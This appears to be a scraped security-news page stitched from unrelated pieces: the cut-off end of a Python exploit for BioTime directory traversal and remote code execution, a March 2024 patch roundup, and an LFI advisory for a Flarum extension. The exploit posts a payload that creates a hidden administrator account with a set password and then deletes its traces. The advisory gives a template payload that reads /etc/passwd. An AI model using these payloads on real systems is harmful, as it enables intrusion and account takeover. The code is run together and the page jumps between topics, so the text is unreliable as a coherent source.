= {        'csrfmiddlewaretoken': csrf_token_value,        'host':myIpaddr,        'port':22,        'is_sftp': 1,        'user_name': dirTraverse,        'user_password':myPassword,        'user_key':'import os\nos.system("net user /add omair190 KCP@ssw0rd && net localgroup administrators ...',        'obj_id': getID    }    response = requests.post(url,  cookies=cookies, data=data, proxies=proxies, verify=False)    print("A new user should be added now on the server \nusername: omair190\npassword: KCP@ssw0rd")    #Delete SFTP    print("Deleting SFTP Settings")    url = f'{target}/base/sftpsetting/action/'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    data = {        'csrfmiddlewaretoken': csrf_token_value,        'id': getID,        'action_name': '47656e6572616c416374696f6e44656c657465'    }    response = requests.post(url,  cookies=cookies, data=data, proxies=proxies, verify=False)#RCEif buildNumber == "9" or build[:5] == "8.5.5":    sftpRCE()# #Relay Creds# createBackup("\\\\192.168.0.11\\KC\\test")

BioTime Directory Traversal / Remote Code Execution

Despite a plethora of available security solutions, more and more organizations fall victim to Ransomware and other threats. These continued threats aren't just an inconvenience that hurt businesses and end users - they damage the economy, endanger lives, destroy businesses and put national security at risk. But if that wasn’t enough – North Korea appears to be using revenue from cyber

Detecting Windows-based Malware Through Better Visibility

Plus: Microsoft patches over 60 vulnerabilities, Mozilla fixes two Firefox zero-day bugs, Google patches 40 issues in Android, and more.

It’s time to check your software updates. March has seen the release of important patches for Apple’s iOS, Google’s Chrome, and its privacy-conscious competitor Firefox. Bugs have also been squashed by enterprise software giants including Cisco, VMware, and SAP.

Here’s what you need to know about the security updates issued in March.

**Apple iOS**

Apple made up for a quiet February by issuing two separate patches in March. At the start of the month, the iPhone maker released iOS 17.4, fixing over 40 flaws including two issues already being used in real-life attacks.

Tracked as CVE-2024-23225, the first bug in the iPhone Kernel could allow an attacker to bypass memory protections. “Apple is aware of a report that this issue may have been exploited,” the iPhone maker said on its support page.

Tracked as CVE-2024-23296, the second flaw, in RTKit, the real-time operating system used in devices including AirPods, could also allow an adversary to bypass Kernel memory protections.

Later in March, Apple released a second software update, iOS 17.4.1, this time fixing two flaws in its iPhone software, both tracked as CVE-2024-1580. Using the issues patched in iOS 17.4.1, an attacker could execute code if they convinced someone to interact with an image.

Soon after issuing iOS 17.4.1, Apple released patches for its other devices to fix the same bugs: Safari 17.4.1, macOS Sonoma 14.4.1 and macOS Ventura 13.6.6.

**Google Chrome**

March was another hectic month for Google, which patched multiple flaws in its Chrome browser. Mid-way through the month, Google released 12 patches, including a fix for CVE-2024-2625, an object-lifecycle issue in V8 with a high severity rating.

Medium-severity issues include CVE-2024-2626, an out-of-bounds read bug in Swiftshader; CVE-2024-2627, a use-after-free flaw in Canvas; and CVE-2024-2628, an inappropriate implementation issue in Downloads.

At the end of the month, Google issued seven security fixes, including a patch for a critical use-after-free flaw in ANGLE tracked as CVE-2024-2883. Two further use-after-free bugs, tracked as CVE-2024-2885 and CVE-2024-2886, were given a high-severity rating. Meanwhile, CVE-2024-2887 is a type-confusion flaw in WebAssembly.

The last two issues were exploited at the Pwn2Own 2024 hacking contest, so you should update your Chrome browser ASAP.

**Mozilla Firefox**

Mozilla’s Firefox had a busy March, after patching two zero-day vulnerabilities exploited at Pwn2Own. CVE-2024-29943 is an out-of-bounds access bypass issue, while CVE-2024-29944 is a privileged JavaScript Execution flaw in Event Handlers that could lead to sandbox escape. Both issues are rated as having a critical impact.

Earlier in the month, Mozilla released Firefox 124 to address 12 security issues, including CVE-2024-2605, a sandbox-escape flaw affecting Windows operating systems. An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system, escaping the sandbox, Mozilla said.

CVE-2024-2615 sees critical-rated memory safety bugs fixed in Firefox 124. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort \[they\] could have been exploited to run arbitrary code,” Mozilla said.

**Google Android**

Google has released its March Android Security Bulletin, fixing nearly 40 issues in its mobile operating system, including two critical bugs in its system component. CVE-2024-0039 is a remote code-execution flaw, while CVE-2024-23717 is an elevation-of-privilege vulnerability.

“The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed,” Google said in its advisory.

You Should Update Apple iOS and Google Chrome ASAP

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a local file inclusion vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Local FileInclusion (LFI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Local FileInclusion (LFI) due to the unsafe handling of file paths in the emailtemplate. An attacker with administrative access can exploit thisvulnerability to include sensitive files from the server's file system inthe email content, potentially leading to information disclosure.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert the following payload at the endof the template:{{ include('/etc/passwd') }}Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the contents of the included file (inthis case, /etc/passwd) in the email content.

Tag

#windows